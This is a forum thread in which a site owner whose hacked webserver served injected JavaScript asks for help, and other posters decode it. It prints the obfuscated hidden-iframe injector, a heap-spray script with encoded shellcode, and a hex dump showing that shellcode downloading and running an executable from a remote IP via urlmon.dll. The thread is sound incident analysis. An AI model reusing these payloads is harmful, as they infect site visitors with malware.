Hi

Recently the webserver my page is on was hacked.   Someone put in some
malicious javascript which I believe redirects the browser to another
webpage.  I want to go to the URL directly using something like links
on Linux or Safari on Mac (as I have a strong suspicion it's probably
exploitin some IE vulnerability or trying to download some Windows
trojan) to work out what exactly it was trying to do.  However it looks
like the URL was obfusticated:

[quote]
s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&${mhxlA4$fsvhivA4$limklx
A4$wx}piA&hmwtpe}>rsri&B';o='';for(i=0;i<92;i++){o+=String.fromCharCode
(s.charCodeAt(i)-4);}document.write(o);
[/quote]

Is there any tool I can use to work out what the URL is from this?

Thanks!

[ Post a follow-up to this message ]

"Wong Yung" <wongyung_peach@yahoo.com> writes:

> Hi
>
> Recently the webserver my page is on was hacked.   Someone put in some
> malicious javascript which I believe redirects the browser to another
> webpage.  I want to go to the URL directly using something like links
> on Linux or Safari on Mac (as I have a strong suspicion it's probably
> exploitin some IE vulnerability or trying to download some Windows
> trojan) to work out what exactly it was trying to do.  However it looks
> like the URL was obfusticated:
>
> [quote]
> s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&${mhxlA4$fsvhivA4$limk
lxA4$wx}piA&hmwtpe}>rsri&B';o='';for(i=0;i<92;i++){o+=String.fromCharCo
de(s.charCodeAt(i)-4);}document.write(o);
> [/quote]
>
> Is there any tool I can use to work out what the URL is from this?

It's javascript so a web browser is all you need.

It's a rot 4 encoding if you will. It's just taking each of the
characters of that string s  and subtracting 4 from it
i.e. s.charCodeAt(i)-4

By changing document.write(o)  to an alert() call you can see what it
says.

It translates to

<iframe src="http://e7da7.in/out.php?s_id=1" width=0 border=0 height=0 style
="display:none">


And that page  appears to redirect somewhere else.

<a
href="http://kaonline.biz/redirect.php?a=/&b=ACURIOUSLONGSTRINGOFHEXCHARACTE
RS">Click here to enter the site </a>



--
Todd H.
http://www.toddh.net/

[ Post a follow-up to this message ]

Todd H. wrote:
> "Wong Yung" <wongyung_peach@yahoo.com> writes:
> 
>
> It's javascript so a web browser is all you need.
>
> It's a rot 4 encoding if you will. It's just taking each of the
> characters of that string s  and subtracting 4 from it
> i.e. s.charCodeAt(i)-4
>
> By changing document.write(o)  to an alert() call you can see what it
> says.
>
> It translates to
>
> <iframe src="http://e7da7.in/out.php?s_id=1" width=0 border=0 height=0 sty
le="display:none">
>
>
> And that page  appears to redirect somewhere else.
>
> <a
>   href="http://kaonline.biz/redirect.php?a=/&b=ACURIOUSLONGSTRINGOFHEXCHAR
ACTERS">Click here to enter the site </a>
>
>
>
> --
> Todd H.
> http://www.toddh.net/

Thanks very much Todd!

I went to the webpage and it's very strange.  It doesn't seem to
attempt to download anything.  They (kaonline.biz) claim that someone
is trying to blackmail them by sending spam in their name and then
trying to extort money from them.  If this is true and they are not
lying their heads off I wonder if this is part of the supposed
extortion attempt. Or maybe they're just saying that because really
they are spammers and...*Sigh* I don't know what to believe anymore.

Still this is only what it is doing *now*.  The webserver looks like it
has been hacked for a while now and god knows what's been happening in
the meantime.

Thanks though for helping out!

[ Post a follow-up to this message ]

"Wong Yung" <wongyung_peach@yahoo.com> writes:

> Thanks very much Todd!
>
> I went to the webpage and it's very strange.  It doesn't seem to
> attempt to download anything.  They (kaonline.biz) claim that someone
> is trying to blackmail them by sending spam in their name and then
> trying to extort money from them.  If this is true and they are not
> lying their heads off I wonder if this is part of the supposed
> extortion attempt. Or maybe they're just saying that because really
> they are spammers and...*Sigh* I don't know what to believe anymore.
>
> Still this is only what it is doing *now*.  The webserver looks like it
> has been hacked for a while now and god knows what's been happening in
> the meantime.
>
> Thanks though for helping out!

No problem.

Was your webhost based on cpanel.net software?  A  few weeks ago, a
whole bunch of cpanel based sites got owned and were used largely to
spread the Internet Explorer 0day exploit dujour.    I think that
issue has been patched but it did affect a lot of folks.   Curious if
you were one of em.

Best Regards,
--
Todd H.
http://www.toddh.net/

[ Post a follow-up to this message ]

Todd H. wrote:
> "Wong Yung" <wongyung_peach@yahoo.com> writes:
> 
>
> No problem.
>
> Was your webhost based on cpanel.net software?  A  few weeks ago, a
> whole bunch of cpanel based sites got owned and were used largely to
> spread the Internet Explorer 0day exploit dujour.    I think that
> issue has been patched but it did affect a lot of folks.   Curious if
> you were one of em.
>
> Best Regards,
> --
> Todd H.
> http://www.toddh.net/


No,

I think the webserver was running Apache on Linux (I say "I think"
because I wasn't admining it so I don't know what exactly was running
on the computer).  The problem is it wasn't updated and so I guess in
the end you can say it was all our own fault.

*Sigh* I'm still worried though because even though it looks like the
hack is fairly harmless now it looks like it was hacked a while ago and
who knows if they hadn't taken the opportunity to download Trojans onto
a few computers first.  You know how it is with security - once one
thing gets compromised everything touching it is tainted because you
can't be sure what the hackers were doing.

Usually I run either Linux (most of these redirect things lead to some
Windows specific malware) or Windows with Firefox with the NoScript
extension which blocks all javascript except on sites you whitelist.
However, I *did* test my website in IE several times when the script
was present so I could make sure the css looked OK.  Nor did I turn off
scripting in IE because I hardly ever use it and I didn't think my own
website would be a security risk.  Not sure what to do now...probably
run a full anti-virus and anti-spyware check but you know that doesn't
catch everything. On the bright side of things I don't remember any
anti-virus alerts, or probably more importantly any warnings about
something trying to replace program x with a different version  (I have
a program which detects when program files get changed) when I was
looking at my site in IE...

Anyway, thanks a lot for your help.  It did help relieve my mind a lot.

[ Post a follow-up to this message ]

Todd H. wrote:
> "Wong Yung" <wongyung_peach@yahoo.com> writes:
> 
lxA4$wx}piA&hmwtpe}>rsri&B';o=3D'';for(i=3D0;i<92;i++){o+=3DString.from
Char=
Code(s.charCodeAt(i)-4);}document.write(o);[vbcol=seagreen] 
>
> It's javascript so a web browser is all you need.
>
> It's a rot 4 encoding if you will. It's just taking each of the
> characters of that string s  and subtracting 4 from it
> i.e. s.charCodeAt(i)-4
>
> By changing document.write(o)  to an alert() call you can see what it
> says.
>
> It translates to
>
> <iframe src=3D"http://e7da7.in/out.php?s_id=3D1" width=3D0 border=3D0 hei=
ght=3D0 style=3D"display:none">
>
>
> And that page  appears to redirect somewhere else.
>
> <a
>   href=3D"http://kaonline.biz/redirect.php?a=3D/&b=3DACURIOUSLONGSTRINGOF=
HEXCHARACTERS">Click here to enter the site </a>
>
>
>
> --
> Todd H.
> http://www.toddh.net/


Actually looking more closely at it there seems to be something else
going on as well.  If I use links, it does exactly as you say.
However, using Opera, Firefox or Konqueror what it does is goes to a
webpage with


<script>var
s=3Dunescape(" %u4141%u4141%u4141%u4141%u4141%u4141%u41
41%u4141");
do{s+=3Ds;}while(s.length<0x0900000);s+=3Dunescape
(" %u54EB%u758B%u8B3C%u3574%u0378%u56F5%u76
8B%u0320
 %u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u38
28%u74F2
 %uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5E
E7%u5E8B
 %u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u04
8B%u038B
 %uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u43
00%u5C3A
 %u2E55%u7865%u0065%uC033%u0364%u3040%u0C
78%u408B
 %u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D
34%u7C40
 %u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFF
FF%uEC83%u8304
 %u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6F
E8%uFFFF%u8BFF
 %u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u53
24%uD0FF%uBF5D
 %uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C
83%u6224%uD0FF
 %u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8
D0%uFFD7%uFFFF
 %u7468%u7074%u2F3A%u362F%u2E36%u3633%u32
2E%u3134%u322E
%u3334%u642F%u652E%u6578");</script></head><body><embed
src=3D"hacked3_files/------------------------------------------------------=
-----.html">

(I named the file hacked3.html)

The
"hacked3_files/-----------------------------------------------------------.=
html"
is a html file with:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /expd/-----------  (the hypthens
continue forever)
 AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ
KKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSS=
 STTTTUUUUVVVVWWWWXXXXYYYYZZZZ00001111222
23333444455556666777788889999.wmv
on this server.<P>
<P>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle
the request.
<HR>
<ADDRESS>Apache/1.3.37 Server at 66.36.241.243 Port 80</ADDRESS>
</BODY></HTML>

So it looks like on Konqueror/Firefox/Opera it was trying to download a
wmv file (which no longer exists on the server).  On links however it
seems to go to an entirely different webpage, the one which as you
point out tries to go to http://kaonline.biz/.

[ Post a follow-up to this message ]

"Wong Yung" wrote:

> Actually looking more closely at it there seems to be something else
> going on as well.  If I use links, it does exactly as you say.
> However, using Opera, Firefox or Konqueror what it does is goes to a
> webpage with
>
> <script>var
> s=unescape(" %u4141%u4141%u4141%u4141%u4141%u4141%u41
41%u4141");
> do{s+=s;}while(s.length<0x0900000);s+=unescape
> (" %u54EB%u758B%u8B3C%u3574%u0378%u56F5%u76
8B%u0320
[snip]

That variable "s" is storing executable code. The script inserts at
least 9437184 "A" characters (a NOP sled of 0x41), followed by code
which looks like this when dumped out in hex/ascii:

0000  EB 54 8B 75 3C 8B 74 35 78 03 F5 56 8B 76 20 03  .T.u<.t5x..V.v .
0010  F5 33 C9 49 41 AD 33 DB 36 0F BE 14 28 38 F2 74  .3.IA.3.6...(8.t
0020  08 C1 CB 0D 03 DA 40 EB EF 3B DF 75 E7 5E 8B 5E  ......@..;.u.^.^
0030  24 03 DD 66 8B 0C 4B 8B 5E 1C 03 DD 8B 04 8B 03  $..f..K.^.......
0040  C5 C3 75 72 6C 6D 6F 6E 2E 64 6C 6C 00 43 3A 5C  ..urlmon.dll.C:\
0050  55 2E 65 78 65 00 33 C0 64 03 40 30 78 0C 8B 40  U.exe.3.d.@0x..@
0060  0C 8B 70 1C AD 8B 40 08 EB 09 8B 40 34 8D 40 7C  ..p...@....@4.@|
0070  8B 40 3C 95 BF 8E 4E 0E EC E8 84 FF FF FF 83 EC  .@<...N.........
0080  04 83 2C 24 3C FF D0 95 50 BF 36 1A 2F 70 E8 6F  ..,$<...P.6./p.o
0090  FF FF FF 8B 54 24 FC 8D 52 BA 33 DB 53 53 52 EB  ....T$..R.3.SSR.
00A0  24 53 FF D0 5D BF 98 FE 8A 0E E8 53 FF FF FF 83  $S..]......S....
00B0  EC 04 83 2C 24 62 FF D0 BF 7E D8 E2 73 E8 40 FF  ...,$b...~..s.@.
00C0  FF FF 52 FF D0 E8 D7 FF FF FF 68 74 74 70 3A 2F  ..R.......http:/
00D0  2F 36 36 2E 33 36 2E 32 34 31 2E 32 34 33 2F 64  /66.36.241.243/d
00E0  2E 65 78 65 00 00 00 00 00 00 00 00 00 00 00 00  .exe............

I'm guessing it would use urlmon.dll to download the file "d.exe" from
66.36.241.243, which is a small executable packed using FSG. There's
also a reference to a file "C:\U.exe".

> The
> "hacked3_files/-----------------------------------------------------------
.html"
> is a html file with:

[...]

> AAAABBBB [snip] NNNNOOOOAAA [snip] 88889999.wmv

The part between my snips had a control character (0x05) either side
of it. I don't know the reason for that.

[...]

> So it looks like on Konqueror/Firefox/Opera it was trying to download a
> wmv file (which no longer exists on the server).  On links however it
> seems to go to an entirely different webpage, the one which as you
> point out tries to go to http://kaonline.biz/.

It appears to be an exploit involving a wmv vulnerability, but I don't
know how the binary code in the script variable "s" gets to be run.

Also spotted here:
http://www.castlecops.com/p842233-P...MV_exploit.html

[ Post a follow-up to this message ]

Ant wrote:
> "Wong Yung" wrote:

> 
>
> It appears to be an exploit involving a wmv vulnerability, but I don't
> know how the binary code in the script variable "s" gets to be run.
>
> Also spotted here:
> http://www.castlecops.com/p842233-P...MV_exploit.html


Wow.  Thanks very much for the info.  And thanks heaps for
unobfusticating the stuff in javascript.  Hmmm...looking at the
castlecops link it looks like we aren't the only ones who were hacked
using the same thing.  Do you have any idea why links goes to
kaonline.biz?  I'm trying to work out what role they play in all of
this.

[ Post a follow-up to this message ]

"Wong Yung" wrote:

> Wow.  Thanks very much for the info.  And thanks heaps for
> unobfusticating the stuff in javascript.  Hmmm...looking at the
> castlecops link it looks like we aren't the only ones who were hacked
> using the same thing.  Do you have any idea why links goes to
> kaonline.biz?  I'm trying to work out what role they play in all of
> this.

I don't know if they are involved. They say they're being attacked,
so you could report it to them, but as far as I can tell there is no
exploit if the redirect is to kaonline.biz.

If I use wget on the "e7da7.in" link, I get redirected to kaonline.
However, if I use telnet, the redirection is to:
ht_p://66.36.241.243/expd/index.php
(I've munged the "http" in case anyone's click-happy)

That's where the malicious code is, and I found a different (and more
obfuscated) exploit to what you posted before.

Where you are redirected, and what exploit is served up probably
depends on the user-agent header of the http request.

[ Post a follow-up to this message ]

Ant wrote:
> "Wong Yung" wrote:
> 
>
> I don't know if they are involved. They say they're being attacked,
> so you could report it to them, but as far as I can tell there is no
> exploit if the redirect is to kaonline.biz.
>
> If I use wget on the "e7da7.in" link, I get redirected to kaonline.
> However, if I use telnet, the redirection is to:
> ht_p://66.36.241.243/expd/index.php
> (I've munged the "http" in case anyone's click-happy)
>
> That's where the malicious code is, and I found a different (and more
> obfuscated) exploit to what you posted before.
>
> Where you are redirected, and what exploit is served up probably
> depends on the user-agent header of the http request.

*Sigh* I couldn't get a nice simple evil guy could I?  BTW what is this
other more obfusticated exploit that you found?

[ Post a follow-up to this message ]